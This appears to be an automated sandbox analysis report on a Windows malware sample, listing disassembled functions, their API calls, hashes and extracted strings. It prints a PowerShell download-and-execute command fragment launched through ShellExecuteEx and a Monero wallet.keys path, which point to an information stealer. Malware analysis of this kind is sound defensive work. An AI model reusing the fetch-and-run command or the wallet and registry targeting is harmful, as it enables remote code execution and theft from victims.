                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                    • Instruction ID: a8e3920d274236e3eca6559199eee7c483683ec8489c8f47ee94ed1a0f88450a
                                    • Opcode Fuzzy Hash: 9458c30296f10069c9c9060e31f9103a1d05ac4bccc30a79142348960a314c1a
                                    • Instruction Fuzzy Hash: 38016DB5A0420CBBEB00DBE4EC4DFAEB7B8EB48709F104194FA08D7291E6749904DB51
                                    Function 00097720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0009773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2BDF0,00000000,00020119,000976B9), ref: 0009775B
                                    • RegQueryValueExA.ADVAPI32(000976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0009777A
                                    • RegCloseKey.ADVAPI32(000976B9), ref: 00097784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                    • Instruction ID: 586df8aa2f1317cbda031f23b287618f71223e806fe60605c437993ef6cc1bb5
                                    • Opcode Fuzzy Hash: 5f27788bcb3697c08a86eeb62e5601f19d59682e83246be7f60bec6eb51ea014
                                    • Instruction Fuzzy Hash: 440112B5A4030CBBEB00DBE4EC4EFAEB7B8FB48705F104559FA05A7291DA705A04CB52
                                    Function 000992E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00093AEE,?), ref: 000992FC
                                    • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00099319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00099327
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID: :$:
                                    • API String ID: 1378416451-2052217321
                                    • Opcode ID: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                    • Instruction ID: 7b95bd8a590ced5df0d69f5119013ad1a842c8fe76755c33039d69fb99ab2d02
                                    • Opcode Fuzzy Hash: 356b33fdd8518e6db723fba3d68a02ecfbf1fcb84999b1e2034a7e98aac1810c
                                    • Instruction Fuzzy Hash: C2F03C75E44208FBDF20DFB4EC49F9EB7B9AB48710F10C258B651A72D0D67097019B50
                                    Function 000940B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 000940D5
                                    • RegOpenKeyExA.ADVAPI32(80000001,00D3E0A8,00000000,00020119,?), ref: 000940F4
                                    • RegQueryValueExA.ADVAPI32(?,00D3F338,00000000,00000000,00000000,000000FF), ref: 00094118
                                    • RegCloseKey.ADVAPI32(?), ref: 00094122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094147
                                    • lstrcat.KERNEL32(?,00D3F2D8), ref: 0009415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                    • String ID:
                                    • API String ID: 2623679115-0
                                    • Opcode ID: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                    • Instruction ID: 50b276cea78cf827573cde4a01559659fc521300c690b37dc4eeecf2a91f2029
                                    • Opcode Fuzzy Hash: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                    • Instruction Fuzzy Hash: 59418AB6D0010CABDB14FBA0FC4AFED777DBB48304F004558B61996182EA755B888B92
                                    Function 000899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                    • LocalFree.KERNEL32(0008148F), ref: 00089A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                    • Instruction ID: d6f8461af0857a3cfb945ad84c8623d296412c710e55632014b62b6fe7b80baa
                                    • Opcode Fuzzy Hash: e32dca6dd4ea3f3804a519cc0228b1248e925d7cb21d83f1890517c655ed142f
                                    • Instruction Fuzzy Hash: DE310AB4A00209EFDB14EF94D989FAE7BF9FF48344F148158E911A7290D774A941CFA2
                                    Function 0009C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Typememset
                                    • String ID:
                                    • API String ID: 3530896902-3916222277
                                    • Opcode ID: 8cd6b8920d645c0be719cc48e6c599a651c24bac3bb86ad66f1d0481ced5bcf0
                                    • Instruction ID: 7639910bb3b47c39c337c607ca3f340db3ede076de2c685ea2ddc6111f0d7c59
                                    • Opcode Fuzzy Hash: 8cd6b8920d645c0be719cc48e6c599a651c24bac3bb86ad66f1d0481ced5bcf0
                                    • Instruction Fuzzy Hash: 8341D97190079C5EEF318B24CD99FFBBBE89F45704F1444E8E9CA96182D2719A44EF60
                                    Function 00094780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00D3F398), ref: 000947DB
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00094801
                                    • lstrcat.KERNEL32(?,?), ref: 00094820
                                    • lstrcat.KERNEL32(?,?), ref: 00094834
                                    • lstrcat.KERNEL32(?,00D2A770), ref: 00094847
                                    • lstrcat.KERNEL32(?,?), ref: 0009485B
                                    • lstrcat.KERNEL32(?,00D3E348), ref: 0009486F
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098D90: GetFileAttributesA.KERNEL32(00000000,?,00081B54,?,?,000A564C,?,?,000A0E1F), ref: 00098D9F
                                      • Part of subcall function 00094570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                      • Part of subcall function 00094570: RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                      • Part of subcall function 00094570: wsprintfA.USER32 ref: 000945A6
                                      • Part of subcall function 00094570: FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                    • Instruction ID: 2c2c3e7f4f97976ef5e1db9254bd49d0c12b57e50ca7298ecc3f9f865f988a97
                                    • Opcode Fuzzy Hash: 1d12421e0215428a90e813f63df8da2d63832dcdba30b7b478b4d105d70614fc
                                    • Instruction Fuzzy Hash: A7317FB290021CA7CF10FBB0DC8AEE9737CAB48704F444589F35996082EE749789DB96
                                    Function 00092C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00092D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00092D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00092CC4
                                    • <, xrefs: 00092D39
                                    • ')", xrefs: 00092CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                    • Instruction ID: e89be59b5f21d0b84a00419fc10e3f9c6de35ff6afc83d4243486df7b854e1e0
                                    • Opcode Fuzzy Hash: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                    • Instruction Fuzzy Hash: 1B41DD71E102189ADF14EBA0D896BEEB774AF15300F404119E116AA192DF746A4AEFD2
                                    Function 00089E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00089F41
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: e9e40540ea179c612c51948f8260904798044c82c536c2eb57bd1719136b1e14
                                    • Instruction ID: 9dc016bd1b12d5dcd1b7036f8e83dd8c51074860d0ed995ff6a559d29aaee753
                                    • Opcode Fuzzy Hash: e9e40540ea179c612c51948f8260904798044c82c536c2eb57bd1719136b1e14
                                    • Instruction Fuzzy Hash: 01612D70A10248DBDF24EFA4CC96BEE77B5BF45300F008118F94A5F592EB746A06CB92
                                    Function 000970D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • memset.MSVCRT ref: 0009716A
                                    Strings
                                    • s, xrefs: 000972AE, 00097179, 0009717C
                                    • s, xrefs: 00097111
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0009718C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpymemset
                                    • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 4047604823-1849715570
                                    • Opcode ID: 9f8627165bde6d4daf0fbb3c8e3d492cd6c6b4651d7c59300f858c3822904c88
                                    • Instruction ID: 355bffb72020971e78e8d699b133527c13a7f442d42e15ecea2f9a95d3078023
                                    • Opcode Fuzzy Hash: 9f8627165bde6d4daf0fbb3c8e3d492cd6c6b4651d7c59300f858c3822904c88
                                    • Instruction Fuzzy Hash: B35181B1D142189BDF64EBA4DC45BEEB3B4AF44304F2040A8E21976182EF746E88DF55
                                    Function 00097E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,00D2B8E8,00000000,00020119,?), ref: 00097E5E
                                    • RegQueryValueExA.ADVAPI32(?,00D3E0E8,00000000,00000000,000000FF,000000FF), ref: 00097E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00097E92
                                    Memory Dump Source
